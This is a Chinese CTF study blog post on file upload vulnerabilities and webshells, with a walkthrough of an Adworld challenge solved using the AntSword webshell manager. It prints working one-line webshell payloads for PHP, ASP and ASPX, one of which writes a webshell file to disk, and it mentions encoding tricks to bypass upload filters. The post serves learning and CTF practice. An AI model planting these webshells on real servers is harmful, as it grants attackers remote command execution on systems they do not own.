目录
简介
文件上传本质上就是将文件传输到服务器时没有做好检测和过滤,导致可上传恶意程序到服务器,从而获得后台权限来干点坏事。一般这个恶意脚本文件称为webshell,通过webshell我们可以查看服务器的目录结构或文件,以及来执行一些系统指令。小马和大马,简单来说,大马是多功能,危害大,体积大的木马,小马是隐蔽性强,体量小,更方便的小木马。一句话木马就属于小马,所以较易突破防护,而大马极易被过滤。
一句话木马
首先通过看一些题解和博客,发现一句话木马要根据语言的不同来考虑如何构建。比如
php:
<?php @eval($_POST[value]);?>
<?php fputs( fopen('xie.php','w') , '<? php eval($_POST[xie]) ?>' ) ; ?>
将当前目录下创建xie.php文件,并且将一句话木马写入xd.php中
(这里再转一个更多方式的一句话木马构造方式)
aspx(asp.net):
<%@ Page Language=“Jscript”%>
<%eval(Request.Item[“value”])%>
asp:
<%execute(request(“v”))%>
蚁剑
当然这里就不得不提到蚁剑和菜刀,我使用的是蚁剑(当前中国菜刀已停止更新,最新版也有bug),那就以蚁剑为例。
安装教程:中国蚁剑安装教程_rab3it的博客-优快云博客_中国蚁剑
例题
在这里以攻防世界的webshell为例
很明显的一句话木马eval为执行括号中指令。而shell在我的理解中和sql的注入点差不多,可以通过改变shell的值来构造一些代码并执行。也就是说可以将shell视为后门。
蚁剑中的连接密码应该就是指这个后门的值,而蚁剑能通过改变这个值来对服务器进行管理。
登入后即可看到flag
总结思路
1.构造一句话木马
2. 注意过滤和防护,必要时使用文件,base64等知识绕过
3.使用万能的蚁剑。
附言
文件上传的题还得多刷寄道,然后做个集合。还是那句话吧,希望自己不要鸽了吧。
希望自己不要这么菜吧 _(:з」∠)_ ----L1men2